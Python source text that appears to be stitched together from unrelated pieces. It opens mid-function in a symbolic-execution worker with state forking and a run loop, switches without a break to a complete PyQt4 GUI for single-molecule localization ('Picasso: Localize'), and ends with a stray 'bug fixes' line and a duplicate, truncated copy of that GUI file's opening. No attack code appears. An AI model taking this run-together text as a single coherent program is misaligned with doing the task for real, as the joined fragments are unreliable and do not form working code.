logger.debug("WARNING: using iterpickle to dump state")
f.write(iterpickle.dumps(state, 2))
f.flush()
logger.debug("saved in %d seconds", time.time() - start)
def fork(self, state, expression, policy='ALL', setstate=None):
'''
Fork state on expression concretizations.
Using policy build a list of solutions for expression.
For the state on each solution setting the new state with setstate
For example if expression is a Bool it may have 2 solutions. True or False.
Parent
(expression = ??)
Child1 Child2
(expression = True) (expression = True)
setstate(True) setstate(False)
The optional setstate() function is supposed to set the concrete value
in the child state.
'''
assert isinstance(expression, Expression)
if setstate is None:
setstate = lambda x,y: None
#Find a set of solutions for expression
solutions = state.concretize(expression, policy)
#We are about to fork current_state
with self._lock:
self.will_fork_state(state, expression, solutions, policy)
#Build and enqueue a state for each solution
children = []
for new_value in solutions:
with state as new_state:
new_state.constrain(expression == new_value) #We already know it's sat
#and set the PC of the new state to the concrete pc-dest
#(or other register or memory address to concrete)
setstate(new_state, new_value)
#enqueue new_state
state_id = self.add(new_state)
#maintain a list of childres for logging purpose
children.append(state_id)
logger.debug("Forking current state into states %r",children)
return None
def run(self):
'''
Entry point of the Executor; called by workers to start analysis.
'''
#policy_order=self.policy_order
#policy=self.policy
current_state = None
current_state_id = None
with WithKeyboardInterruptAs(self.shutdown):
#notify siblings we are about to start a run
self._start_run()
logger.debug("Starting Manticore Symbolic Emulator Worker (pid %d).",os.getpid())
while not self.is_shutdown():
try:
#select a suitable state to analyze
if current_state is None:
with self._lock:
#notify siblings we are about to stop this run
self._stop_run()
#Select a single state_id
current_state_id = self.get()
#load selected state from secondary storage
current_state = self.load(current_state_id)
#notify siblings we have a state to play with
self._start_run()
#If current_state is still None. We are done.
if current_state is None:
logger.debug("No more states in the queue, byte bye!")
break
assert current_state is not None
try:
# Allows to terminate manticore worker on user request
while not self.is_shutdown():
if not current_state.execute():
break
else:
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Shutdown')
current_state = None
#Handling Forking and terminating exceptions
except Concretize as e:
#expression
#policy
#setstate()
logger.debug("Generic state fork on condition")
self.fork(current_state, e.expression, e.policy, e.setstate)
current_state = None
except TerminateState as e:
#logger.error("MemoryException at PC: 0x{:016x}. Cause: {}\n".format(current_state.cpu.instruction.address, e.cause))
#self.generate_testcase(current_state, "Memory Exception: " + str(e))
#self.generate_testcase(current_state, "Invalid PC Exception" + str(e))
#self.generate_testcase(current_state, "Program finished correctly")
#logger.error("Syscall not implemented: %s", str(e))
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, e)
logger.debug("Generic terminate state")
if e.testcase:
self.generate_testcase(current_state, str(e))
current_state = None
except SolverException as e:
import traceback
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_exc:"
traceback.print_exc()
#Notify this state is done
self.will_terminate_state(current_state, current_state_id, e)
if solver.check(current_state.constraints):
self.generate_testcase(current_state, "Solver failed" + str(e))
current_state = None
except (Exception, AssertionError) as e:
import traceback
trace = traceback.format_exc()
logger.error("Exception: %s\n%s", str(e), trace)
#Notify this worker is done
self.will_terminate_state(current_state, current_state_id, 'Exception')
current_state = None
logger.setState(None)
assert current_state is None
#notify siblings we are about to stop this run
self._stop_run()
#Notify this worker is done (not sure it's needed)
self.will_finish_run()
|
#!/usr/bin/env python
"""
gui/localize
~~~~~~~~~~~~~~~~~~~~
Graphical user interface for localizing single molecules
:author: Joerg Schnitzbauer, 2015
"""
import os.path
import sys
import yaml
from PyQt4 import QtCore, QtGui
import time
import numpy as np
import traceback
from concurrent.futures import wait
_this_file = os.path.abspath(__file__)
_this_directory = os.path.dirname(_this_file)
_parent_directory = os.path.dirname(_this_directory)
sys.path.insert(0, _parent_directory) # We want to use the local picasso instead the system-wide
from picasso import io, localize
CMAP_GRAYSCALE = [QtGui.qRgb(_, _, _) for _ in range(256)]
DEFAULT_PARAMETERS = {'Box Size': 7, 'Minimum LGM': 5000}
class RubberBand(QtGui.QRubberBand):
def __init__(self, parent):
super().__init__(QtGui.QRubberBand.Rectangle, parent)
def paintEvent(self, event):
painter = QtGui.QPainter(self)
color = QtGui.QColor(QtCore.Qt.blue)
painter.setPen(QtGui.QPen(color))
rect = event.rect()
rect.setHeight(rect.height() - 1)
rect.setWidth(rect.width() - 1)
painter.drawRect(rect)
class View(QtGui.QGraphicsView):
""" The central widget which shows `Scene` objects of individual frames """
def __init__(self, window):
super().__init__(window)
self.window = window
self.setAcceptDrops(True)
self.pan = False
self.hscrollbar = self.horizontalScrollBar()
self.vscrollbar = self.verticalScrollBar()
self.rubberband = RubberBand(self)
self.roi = None
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.roi_origin = QtCore.QPoint(event.pos())
self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, QtCore.QSize()))
self.rubberband.show()
elif event.button() == QtCore.Qt.RightButton:
self.pan = True
self.pan_start_x = event.x()
self.pan_start_y = event.y()
self.setCursor(QtCore.Qt.ClosedHandCursor)
event.accept()
else:
event.ignore()
def mouseMoveEvent(self, event):
if event.buttons() == QtCore.Qt.LeftButton:
self.rubberband.setGeometry(QtCore.QRect(self.roi_origin, event.pos()))
if self.pan:
self.hscrollbar.setValue(self.hscrollbar.value() - event.x() + self.pan_start_x)
self.vscrollbar.setValue(self.vscrollbar.value() - event.y() + self.pan_start_y)
self.pan_start_x = event.x()
self.pan_start_y = event.y()
event.accept()
else:
event.ignore()
def mouseReleaseEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.roi_end = QtCore.QPoint(event.pos())
dx = abs(self.roi_end.x() - self.roi_origin.x())
dy = abs(self.roi_end.y() - self.roi_origin.y())
if dx < 10 or dy < 10:
self.roi = None
self.rubberband.hide()
else:
roi_points = (self.mapToScene(self.roi_origin), self.mapToScene(self.roi_end))
self.roi = list([[int(_.y()), int(_.x())] for _ in roi_points])
self.window.draw_frame()
elif event.button() == QtCore.Qt.RightButton:
self.pan = False
self.setCursor(QtCore.Qt.ArrowCursor)
event.accept()
else:
event.ignore()
def wheelEvent(self, event):
""" Implements zoooming with the mouse wheel """
scale = 1.008 ** (-event.delta())
self.scale(scale, scale)
class Scene(QtGui.QGraphicsScene):
""" Scenes render indivdual frames and can be displayed in a `View` widget """
def __init__(self, window, parent=None):
super().__init__(parent)
self.window = window
self.dragMoveEvent = self.dragEnterEvent
def path_from_drop(self, event):
url = event.mimeData().urls()[0]
path = url.toLocalFile()
base, extension = os.path.splitext(path)
return path, extension
def drop_has_valid_url(self, event):
if not event.mimeData().hasUrls():
return False
path, extension = self.path_from_drop(event)
if extension.lower() not in ['.raw', '.yaml']:
return False
return True
def dragEnterEvent(self, event):
if self.drop_has_valid_url(event):
event.accept()
else:
event.ignore()
def dropEvent(self, event):
""" Loads raw movies or yaml parameters when dropped into the scene """
path, extension = self.path_from_drop(event)
if extension == '.raw':
self.window.open(path)
elif extension == '.yaml':
self.window.load_parameters(path)
else:
pass # TODO: send message to user
class FitMarker(QtGui.QGraphicsItemGroup):
def __init__(self, x, y, size, parent=None):
super().__init__(parent)
L = size/2
line1 = QtGui.QGraphicsLineItem(x-L, y-L, x+L, y+L)
line1.setPen(QtGui.QPen(QtGui.QColor(0, 255, 0)))
self.addToGroup(line1)
line2 = QtGui.QGraphicsLineItem(x-L, y+L, x+L, y-L)
line2.setPen(QtGui.QPen(QtGui.QColor(0, 255, 0)))
self.addToGroup(line2)
class OddSpinBox(QtGui.QSpinBox):
""" A spinbox that allows only odd numbers """
def __init__(self, parent=None):
super().__init__(parent)
self.setSingleStep(2)
self.valueChanged.connect(self.on_value_changed)
def on_value_changed(self, value):
if value % 2 == 0:
self.setValue(value + 1)
class ParametersDialog(QtGui.QDialog):
""" The dialog showing analysis parameters """
def __init__(self, parent=None):
super().__init__(parent)
self.window = parent
self.setWindowTitle('Parameters')
self.resize(300, 0)
self.setModal(False)
vbox = QtGui.QVBoxLayout(self)
identification_groupbox = QtGui.QGroupBox('Identification')
vbox.addWidget(identification_groupbox)
identification_grid = QtGui.QGridLayout(identification_groupbox)
# Box Size
identification_grid.addWidget(QtGui.QLabel('Box side length:'), 0, 0)
self.box_spinbox = OddSpinBox()
self.box_spinbox.setValue(DEFAULT_PARAMETERS['Box Size'])
self.box_spinbox.valueChanged.connect(self.on_box_changed)
identification_grid.addWidget(self.box_spinbox, 0, 1)
# Minimum LGM
identification_grid.addWidget(QtGui.QLabel('Minimum LGM:'), 1, 0)
self.mlgm_spinbox = QtGui.QSpinBox()
self.mlgm_spinbox.setRange(0, 999999)
self.mlgm_spinbox.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
self.mlgm_spinbox.setKeyboardTracking(False)
self.mlgm_spinbox.valueChanged.connect(self.on_mlgm_spinbox_changed)
identification_grid.addWidget(self.mlgm_spinbox, 1, 1)
# Slider
self.mlgm_slider = QtGui.QSlider()
self.mlgm_slider.setOrientation(QtCore.Qt.Horizontal)
self.mlgm_slider.setRange(0, 10000)
self.mlgm_slider.setValue(DEFAULT_PARAMETERS['Minimum LGM'])
self.mlgm_slider.setSingleStep(1)
self.mlgm_slider.setPageStep(20)
self.mlgm_slider.valueChanged.connect(self.on_mlgm_slider_changed)
identification_grid.addWidget(self.mlgm_slider, 2, 0, 1, 2)
hbox = QtGui.QHBoxLayout()
identification_grid.addLayout(hbox, 3, 0, 1, 2)
# Min SpinBox
self.mlgm_min_spinbox = QtGui.QSpinBox()
self.mlgm_min_spinbox.setRange(0, 999999)
self.mlgm_min_spinbox.setKeyboardTracking(False)
self.mlgm_min_spinbox.setValue(0)
self.mlgm_min_spinbox.valueChanged.connect(self.on_mlgm_min_changed)
hbox.addWidget(self.mlgm_min_spinbox)
hbox.addStretch(1)
# Max SpinBox
self.mlgm_max_spinbox = QtGui.QSpinBox()
self.mlgm_max_spinbox.setKeyboardTracking(False)
self.mlgm_max_spinbox.setRange(0, 999999)
self.mlgm_max_spinbox.setValue(10000)
self.mlgm_max_spinbox.valueChanged.connect(self.on_mlgm_max_changed)
hbox.addWidget(self.mlgm_max_spinbox)
self.preview_checkbox = QtGui.QCheckBox('Preview')
self.preview_checkbox.setTristate(False)
# self.preview_checkbox.setChecked(True)
self.preview_checkbox.stateChanged.connect(self.on_preview_changed)
identification_grid.addWidget(self.preview_checkbox, 4, 0)
fit_groupbox = QtGui.QGroupBox('Fitting')
vbox.addWidget(fit_groupbox)
fit_grid = QtGui.QGridLayout(fit_groupbox)
# Camera
fit_grid.addWidget(QtGui.QLabel('Camera:'), 0, 0)
self.camera_combo = QtGui.QComboBox()
self.camera_combo.currentIndexChanged.connect(self.on_camera_changed)
fit_grid.addWidget(self.camera_combo, 0, 1)
self.em_checkbox = QtGui.QCheckBox('Electron Multiplying')
self.em_checkbox.toggled.connect(self.update_readmodes)
fit_grid.addWidget(self.em_checkbox, 1, 1)
fit_grid.addWidget(QtGui.QLabel('EM Real Gain:'), 2, 0)
self.gain_spinbox = QtGui.QSpinBox()
self.gain_spinbox.setRange(1, 1000)
fit_grid.addWidget(self.gain_spinbox, 2, 1)
fit_grid.addWidget(QtGui.QLabel('Readout Mode:'), 3, 0)
self.readmode_combo = QtGui.QComboBox()
self.readmode_combo.currentIndexChanged.connect(self.update_preamps)
fit_grid.addWidget(self.readmode_combo, 3, 1)
fit_grid.addWidget(QtGui.QLabel('Pre-Amp Gain:'), 4, 0)
self.preamp_combo = QtGui.QComboBox()
fit_grid.addWidget(self.preamp_combo, 4, 1)
fit_grid.addWidget(QtGui.QLabel('Excitation Wavelength:'), 5, 0)
self.excitation_combo = QtGui.QComboBox()
fit_grid.addWidget(self.excitation_combo, 5, 1)
self.camera_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'].keys())))
def on_camera_changed(self, index):
self.update_readmodes(index)
self.excitation_combo.clear()
camera = self.camera_combo.currentText()
if camera:
wavelengths = sorted(list(localize.CONFIG['Cameras'][camera]['Quantum Efficiency'].keys()))
wavelengths = [str(_) for _ in wavelengths]
self.excitation_combo.addItems([''] + wavelengths)
def update_readmodes(self, index):
self.readmode_combo.clear()
camera = self.camera_combo.currentText()
if camera:
if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
em = self.em_checkbox.isChecked()
self.readmode_combo.addItems([''] + sorted(list(localize.CONFIG['Cameras'][camera]['Sensitivity'][em].keys())))
def update_preamps(self, index):
self.preamp_combo.clear()
camera = self.camera_combo.currentText()
if camera:
if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
em = self.em_checkbox.isChecked()
readmode = self.readmode_combo.currentText()
if readmode:
preamps = range(len(localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode]))
preamps = [''] + [str(_ + 1) for _ in list(preamps)]
self.preamp_combo.addItems(preamps)
def on_box_changed(self, value):
self.window.on_parameters_changed()
def on_mlgm_spinbox_changed(self, value):
if value < self.mlgm_slider.minimum():
self.mlgm_min_spinbox.setValue(value)
if value > self.mlgm_slider.maximum():
self.mlgm_max_spinbox.setValue(value)
self.mlgm_slider.setValue(value)
def on_mlgm_slider_changed(self, value):
self.mlgm_spinbox.setValue(value)
if self.preview_checkbox.isChecked():
self.window.on_parameters_changed()
def on_mlgm_min_changed(self, value):
self.mlgm_slider.setMinimum(value)
def on_mlgm_max_changed(self, value):
self.mlgm_slider.setMaximum(value)
def on_preview_changed(self, state):
self.window.draw_frame()
def set_camera_parameters(self, parameters):
self.camera_combo.setCurrentIndex(0)
if 'Camera' in parameters:
camera = parameters['Camera']
for index in range(self.camera_combo.count()):
if self.camera_combo.itemText(index) == camera:
self.camera_combo.setCurrentIndex(index)
break
if 'Electron Multiplying' in parameters:
self.em_checkbox.setChecked(parameters['Electron Multiplying'])
if parameters['Electron Multiplying']:
if 'EM Real Gain' in parameters:
self.gain_spinbox.setValue(parameters['EM Real Gain'])
self.readmode_combo.setCurrentIndex(0)
if 'Readout Mode' in parameters:
for index in range(self.readmode_combo.count()):
if self.readmode_combo.itemText(index) == parameters['Readout Mode']:
self.readmode_combo.setCurrentIndex(index)
break
self.preamp_combo.setCurrentIndex(0)
if 'Pre-Amp Gain' in parameters:
for index in range(self.preamp_combo.count()):
if self.preamp_combo.itemText(index) == str(parameters['Pre-Amp Gain']):
self.preamp_combo.setCurrentIndex(index)
break
self.excitation_combo.setCurrentIndex(0)
if 'Excitation Wavelength' in parameters:
for index in range(self.excitation_combo.count()):
if self.excitation_combo.itemText(index) == parameters['Excitation Wavelength']:
self.excitation_combo.setCurrentIndex(index)
break
def get_camera_parameters(self):
camera = self.camera_combo.currentText()
parameters = {'Camera': self.camera_combo.currentText()}
if localize.CONFIG['Cameras'][camera]['Sensor'] == 'EMCCD':
parameters['Electron Multiplying'] = self.em_checkbox.isChecked()
parameters['EM Real Gain'] = self.gain_spinbox.value()
parameters['Readout Mode'] = self.readmode_combo.currentText()
parameters['Pre-Amp Gain'] = int(self.preamp_combo.currentText())
elif localize.CONFIG['Cameras'][camera]['Sensor'] == 'sCMOS':
pass
try:
parameters['Excitation Wavelength'] = int(self.excitation_combo.currentText())
except ValueError:
raise ValueError('You must set the wavelength!')
return parameters
class ContrastDialog(QtGui.QDialog):
def __init__(self, window):
super().__init__(window)
self.window = window
self.setWindowTitle('Contrast')
self.resize(200, 0)
self.setModal(False)
grid = QtGui.QGridLayout(self)
black_label = QtGui.QLabel('Black:')
grid.addWidget(black_label, 0, 0)
self.black_spinbox = QtGui.QSpinBox()
self.black_spinbox.setKeyboardTracking(False)
self.black_spinbox.setRange(0, 999999)
self.black_spinbox.valueChanged.connect(self.on_contrast_changed)
grid.addWidget(self.black_spinbox, 0, 1)
white_label = QtGui.QLabel('White:')
grid.addWidget(white_label, 1, 0)
self.white_spinbox = QtGui.QSpinBox()
self.white_spinbox.setKeyboardTracking(False)
self.white_spinbox.setRange(0, 999999)
self.white_spinbox.valueChanged.connect(self.on_contrast_changed)
grid.addWidget(self.white_spinbox, 1, 1)
self.auto_checkbox = QtGui.QCheckBox('Auto')
self.auto_checkbox.setTristate(False)
self.auto_checkbox.setChecked(True)
self.auto_checkbox.stateChanged.connect(self.on_auto_changed)
grid.addWidget(self.auto_checkbox, 2, 0, 1, 2)
self.silent_contrast_change = False
def change_contrast_silently(self, black, white):
self.silent_contrast_change = True
self.black_spinbox.setValue(black)
self.white_spinbox.setValue(white)
self.silent_contrast_change = False
def on_contrast_changed(self, value):
if not self.silent_contrast_change:
self.auto_checkbox.setChecked(False)
self.window.draw_frame()
def on_auto_changed(self, state):
if state:
movie = self.window.movie
frame_number = self.window.current_frame_number
frame = movie[frame_number]
self.change_contrast_silently(frame.min(), frame.max())
self.window.draw_frame()
class Window(QtGui.QMainWindow):
""" The main window """
def __init__(self):
super().__init__()
# Init GUI
self.setWindowTitle('Picasso: Localize')
this_directory = os.path.dirname(os.path.realpath(__file__))
icon_path = os.path.join(this_directory, 'localize.ico')
icon = QtGui.QIcon(icon_path)
self.setWindowIcon(icon)
self.resize(768, 768)
self.parameters_dialog = ParametersDialog(self)
self.contrast_dialog = ContrastDialog(self)
self.init_menu_bar()
self.view = View(self)
self.setCentralWidget(self.view)
self.scene = Scene(self)
self.view.setScene(self.scene)
self.status_bar = self.statusBar()
self.status_bar_frame_indicator = QtGui.QLabel()
self.status_bar.addPermanentWidget(self.status_bar_frame_indicator)
#: Holds the current movie as a numpy memmap in the format (frame, y, x)
self.movie = None
#: A dictionary of analysis parameters used for the last operation
self.last_identification_info = None
#: A numpy.recarray of identifcations with fields frame, x and y
self.identifications = None
self.ready_for_fit = False
self.locs = None
def init_menu_bar(self):
menu_bar = self.menuBar()
""" File """
file_menu = menu_bar.addMenu('File')
open_action = file_menu.addAction('Open movie')
open_action.setShortcut('Ctrl+O')
open_action.triggered.connect(self.open_file_dialog)
file_menu.addAction(open_action)
save_action = file_menu.addAction('Save localizations')
save_action.setShortcut('Ctrl+S')
save_action.triggered.connect(self.save_locs_dialog)
file_menu.addAction(save_action)
file_menu.addSeparator()
# open_parameters_action = file_menu.addAction('Load parameters')
# open_parameters_action.setShortcut('Ctrl+Shift+O')
# open_parameters_action.triggered.connect(self.open_parameters)
# file_menu.addAction(open_parameters_action)
# save_parameters_action = file_menu.addAction('Save parameters')
# save_parameters_action.setShortcut('Ctrl+Shift+S')
# save_parameters_action.triggered.connect(self.save_parameters)
# file_menu.addAction(save_parameters_action)
""" View """
view_menu = menu_bar.addMenu('View')
previous_frame_action = view_menu.addAction('Previous frame')
previous_frame_action.setShortcut('Left')
previous_frame_action.triggered.connect(self.previous_frame)
view_menu.addAction(previous_frame_action)
next_frame_action = view_menu.addAction('Next frame')
next_frame_action.setShortcut('Right')
next_frame_action.triggered.connect(self.next_frame)
view_menu.addAction(next_frame_action)
view_menu.addSeparator()
first_frame_action = view_menu.addAction('First frame')
first_frame_action.setShortcut('Home')
first_frame_action.triggered.connect(self.first_frame)
view_menu.addAction(first_frame_action)
last_frame_action = view_menu.addAction('Last frame')
last_frame_action.setShortcut('End')
last_frame_action.triggered.connect(self.last_frame)
view_menu.addAction(last_frame_action)
go_to_frame_action = view_menu.addAction('Go to frame')
go_to_frame_action.setShortcut('Ctrl+G')
go_to_frame_action.triggered.connect(self.to_frame)
view_menu.addAction(go_to_frame_action)
view_menu.addSeparator()
zoom_in_action = view_menu.addAction('Zoom in')
zoom_in_action.setShortcuts(['Ctrl++', 'Ctrl+='])
zoom_in_action.triggered.connect(self.zoom_in)
view_menu.addAction(zoom_in_action)
zoom_out_action = view_menu.addAction('Zoom out')
zoom_out_action.setShortcut('Ctrl+-')
zoom_out_action.triggered.connect(self.zoom_out)
view_menu.addAction(zoom_out_action)
fit_in_view_action = view_menu.addAction('Fit image to window')
fit_in_view_action.setShortcut('Ctrl+W')
fit_in_view_action.triggered.connect(self.fit_in_view)
view_menu.addAction(fit_in_view_action)
view_menu.addSeparator()
display_settings_action = view_menu.addAction('Contrast')
display_settings_action.setShortcut('Ctrl+C')
display_settings_action.triggered.connect(self.contrast_dialog.show)
view_menu.addAction(display_settings_action)
""" Analyze """
analyze_menu = menu_bar.addMenu('Analyze')
parameters_action = analyze_menu.addAction('Parameters')
parameters_action.setShortcut('Ctrl+P')
parameters_action.triggered.connect(self.parameters_dialog.show)
analyze_menu.addAction(parameters_action)
analyze_menu.addSeparator()
identify_action = analyze_menu.addAction('Identify')
identify_action.setShortcut('Ctrl+I')
identify_action.triggered.connect(self.identify)
analyze_menu.addAction(identify_action)
fit_action = analyze_menu.addAction('Fit')
fit_action.setShortcut('Ctrl+F')
fit_action.triggered.connect(self.fit)
analyze_menu.addAction(fit_action)
localize_action = analyze_menu.addAction('Localize (Identify && Fit)')
localize_action.setShortcut('Ctrl+L')
localize_action.triggered.connect(self.localize)
analyze_menu.addAction(localize_action)
def open_file_dialog(self):
path = QtGui.QFileDialog.getOpenFileName(self, 'Open image sequence', filter='*.raw')
if path:
self.open(path)
def open(self, path):
try:
self.movie, self.info = io.load_raw(path, memory_map=True)
self.movie_path = path
self.identifications = None
self.locs = None
self.ready_for_fit = False
self.set_frame(0)
self.fit_in_view()
self.parameters_dialog.set_camera_parameters(self.info[0])
except FileNotFoundError:
pass # TODO send a message
def previous_frame(self):
if self.movie is not None:
if self.current_frame_number > 0:
self.set_frame(self.current_frame_number - 1)
def next_frame(self):
if self.movie is not None:
if self.current_frame_number + 1 < self.info[0]['Frames']:
self.set_frame(self.current_frame_number + 1)
def first_frame(self):
if self.movie is not None:
self.set_frame(0)
def last_frame(self):
if self.movie is not None:
self.set_frame(self.info[0]['Frames'] - 1)
def to_frame(self):
if self.movie is not None:
frames = self.info[0]['Frames']
number, ok = QtGui.QInputDialog.getInt(self, 'Go to frame', 'Frame number:', self.current_frame_number+1, 1, frames)
if ok:
self.set_frame(number - 1)
def set_frame(self, number):
self.current_frame_number = number
if self.contrast_dialog.auto_checkbox.isChecked():
black = self.movie[number].min()
white = self.movie[number].max()
self.contrast_dialog.change_contrast_silently(black, white)
self.draw_frame()
self.status_bar_frame_indicator.setText('{:,}/{:,}'.format(number + 1, self.info[0]['Frames']))
def draw_frame(self):
if self.movie is not None:
frame = self.movie[self.current_frame_number]
frame = frame.astype('float32')
if self.contrast_dialog.auto_checkbox.isChecked():
frame -= frame.min()
frame /= frame.max()
else:
frame -= self.contrast_dialog.black_spinbox.value()
frame /= self.contrast_dialog.white_spinbox.value()
frame *= 255.0
frame = np.maximum(frame, 0)
frame = np.minimum(frame, 255)
frame = frame.astype('uint8')
height, width = frame.shape
image = QtGui.QImage(frame.data, width, height, width, QtGui.QImage.Format_Indexed8)
image.setColorTable(CMAP_GRAYSCALE)
pixmap = QtGui.QPixmap.fromImage(image)
self.scene = Scene(self)
self.scene.addPixmap(pixmap)
self.view.setScene(self.scene)
if self.ready_for_fit:
identifications_frame = self.identifications[self.identifications.frame == self.current_frame_number]
box = self.last_identification_info['Box Size']
self.draw_identifications(identifications_frame, box, QtGui.QColor('yellow'))
else:
if self.parameters_dialog.preview_checkbox.isChecked():
identifications_frame = localize.identify_by_frame_number(self.movie,
self.parameters,
self.current_frame_number,
self.view.roi)
box = self.parameters['Box Size']
self.status_bar.showMessage('Found {:,} spots in current frame.'.format(len(identifications_frame)))
self.draw_identifications(identifications_frame, box, QtGui.QColor('red'))
else:
self.status_bar.showMessage('')
if self.locs is not None:
locs_frame = self.locs[self.locs.frame == self.current_frame_number]
for loc in locs_frame:
self.scene.addItem(FitMarker(loc.x+0.5, loc.y+0.5, 1))
def draw_identifications(self, identifications, box, color):
box_half = int(box / 2)
for identification in identifications:
x = identification.x
y = identification.y
self.scene.addRect(x - box_half, y - box_half, box, box, color)
def open_parameters(self):
path = QtGui.QFileDialog.getOpenFileName(self, 'Open parameters', filter='*.yaml')
if path:
self.load_parameters(path)
def load_parameters(self, path):
with open(path, 'r') as file:
parameters = yaml.load(file)
self.parameters_dialog.box_spinbox.setValue(parameters['Box Size'])
self.parameters_dialog.mlgm_spinbox.setValue(parameters['Minimum LGM'])
self.status_bar.showMessage('Parameter file {} loaded.'.format(path))
def save_parameters(self):
path = QtGui.QFileDialog.getSaveFileName(self, 'Save parameters', filter='*.yaml')
if path:
with open(path, 'w') as file:
yaml.dump(self.parameters, file, default_flow_style=False)
@property
def parameters(self):
return {'Box Size': self.parameters_dialog.box_spinbox.value(),
'Minimum LGM': self.parameters_dialog.mlgm_slider.value()}
def on_parameters_changed(self):
self.locs = None
self.ready_for_fit = False
self.draw_frame()
def identify(self, fit_afterwards=False):
if self.movie is not None:
self.status_bar.showMessage('Preparing identification...')
self.identificaton_worker = IdentificationWorker(self, fit_afterwards)
self.identificaton_worker.progressMade.connect(self.on_identify_progress)
self.identificaton_worker.finished.connect(self.on_identify_finished)
self.identificaton_worker.start()
def on_identify_progress(self, frame_number, parameters):
n_frames = self.info[0]['Frames']
box = parameters['Box Size']
mmlg = parameters['Minimum LGM']
message = 'Identifying in frame {:,}/{:,} (Box Size: {:,}; Minimum LGM: {:,})...'.format(frame_number,
n_frames,
box,
mmlg)
self.status_bar.showMessage(message)
def on_identify_finished(self, parameters, roi, identifications, fit_afterwards):
if len(identifications):
self.locs = None
self.last_identification_info = parameters.copy()
self.last_identification_info['ROI'] = roi
n_identifications = len(identifications)
box = parameters['Box Size']
mmlg = parameters['Minimum LGM']
message = 'Identified {:,} spots (Box Size: {:,}; Minimum LGM: {:,}). Ready for fit.'.format(n_identifications,
box, mmlg)
self.status_bar.showMessage(message)
self.identifications = identifications
self.ready_for_fit = True
self.draw_frame()
if fit_afterwards:
self.fit()
def fit(self):
if self.movie is not None and self.ready_for_fit:
self.status_bar.showMessage('Preparing fit...')
parameters = self.parameters_dialog.get_camera_parameters()
camera = parameters['Camera']
sensor = localize.CONFIG['Cameras'][camera]['Sensor']
camera_info = {'sensor': sensor}
if sensor == 'EMCCD':
em = parameters['Electron Multiplying']
readmode = parameters['Readout Mode']
preamp = parameters['Pre-Amp Gain'] - 1
camera_info['sensitivity'] = localize.CONFIG['Cameras'][camera]['Sensitivity'][em][readmode][preamp]
if em:
camera_info['gain'] = parameters['EM Real Gain']
else:
camera_info['gain'] = 1
elif sensor == 'sCMOS':
pass # put calibration here
excitation = parameters['Excitation Wavelength']
camera_info['qe'] = localize.CONFIG['Cameras'][camera]['Quantum Efficiency'][excitation]
self.fit_worker = FitWorker(self.movie, camera_info, self.identifications, self.parameters['Box Size'])
self.fit_worker.progressMade.connect(self.on_fit_progress)
self.fit_worker.finished.connect(self.on_fit_finished)
self.fit_worker.start()
def on_fit_progress(self, current, n_spots):
message = 'Fitting spot {:,}/{:,}...'.format(current, n_spots)
self.status_bar.showMessage(message)
def on_fit_finished(self, locs):
self.status_bar.showMessage('Fitted {:,} spots.'.format(len(locs)))
self.locs = locs
self.draw_frame()
base, ext = os.path.splitext(self.movie_path)
self.save_locs(base + '_locs.hdf5')
def fit_in_view(self):
self.view.fitInView(self.scene.sceneRect(), QtCore.Qt.KeepAspectRatio)
def zoom_in(self):
self.view.scale(10 / 7, 10 / 7)
def zoom_out(self):
self.view.scale(7 / 10, 7 / 10)
def save_locs(self, path):
localize_info = self.last_identification_info.copy()
localize_info['Generated by'] = 'Picasso Localize'
info = self.info + [localize_info]
io.save_locs(path, self.locs, info)
def save_locs_dialog(self):
base, ext = os.path.splitext(self.movie_path)
locs_path = base + '_locs.hdf5'
path = QtGui.QFileDialog.getSaveFileName(self, 'Save localizations', locs_path, filter='*.hdf5')
if path:
self.save_locs(path)
def localize(self):
self.identify(fit_afterwards=True)
class IdentificationWorker(QtCore.QThread):
progressMade = QtCore.pyqtSignal(int, dict)
finished = QtCore.pyqtSignal(dict, list, np.recarray, bool)
def __init__(self, window, fit_afterwards):
super().__init__()
self.window = window
self.movie = window.movie
self.roi = window.view.roi
self.parameters = window.parameters
self.fit_afterwards = fit_afterwards
def run(self):
futures = localize.identify_async(self.movie, self.parameters, self.roi)
not_done = futures
while not_done:
done, not_done = wait(futures, 0.1)
self.progressMade.emit(len(done), self.parameters)
identifications = np.hstack([_.result() for _ in futures]).view(np.recarray)
self.finished.emit(self.parameters, self.roi, identifications, self.fit_afterwards)
class FitWorker(QtCore.QThread):
progressMade = QtCore.pyqtSignal(int, int)
finished = QtCore.pyqtSignal(np.recarray)
def __init__(self, movie, camera_info, identifications, box):
super().__init__()
self.movie = movie
self.camera_info = camera_info
self.identifications = identifications
self.box = box
def run(self):
thread, fit_info = localize.fit_async(self.movie, self.camera_info, self.identifications, self.box)
while thread.is_alive():
self.progressMade.emit(fit_info.current, fit_info.n_spots)
time.sleep(0.1)
thread.join() # just in case...
locs = localize.locs_from_fit_info(fit_info, self.identifications, self.box)
self.finished.emit(locs)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
window = Window()
window.show()
def excepthook(type, value, tback):
message = ''.join(traceback.format_exception(type, value, tback))
errorbox = QtGui.QMessageBox.critical(window, 'An error occured', message)
errorbox.exec_()
sys.__excepthook__(type, value, tback)
sys.excepthook = excepthook
sys.exit(app.exec_())
bug fixes
#!/usr/bin/env python
"""
gui/localize
~~~~~~~~~~~~~~~~~~~~
Graphical user interface for localizing single molecules
:author: Joerg Schnitzbauer, 2015
"""
import os.path
import sys
import yaml
from PyQt4 import QtCore, QtGui
import time
import numpy as np
import traceback
from concurrent.futures import wait
_this_file = os.path.abspath(__file__)
_this_directory = os.path.dirname(_this_file)
_parent_directory = os.path.dirname(_this_directory)
sys.path.insert(0, _parent_directory) # We want to use the local picasso instead the system-wide
from picasso import io, localize
CMAP_GRAYSCALE = [QtGui.qRgb(_, _, _) for _ in range(256)]
DEFAULT_PARAMETERS = {'Box Size': 7, 'Minimum LGM': 5000}
class RubberBand(QtGui.QRubberBand):
def __init__(self, parent):
super().__init__(QtGui.QRubberBand.Rectangle, parent)
def paintEvent(self, event):
painter = QtGui.QPainter(self)
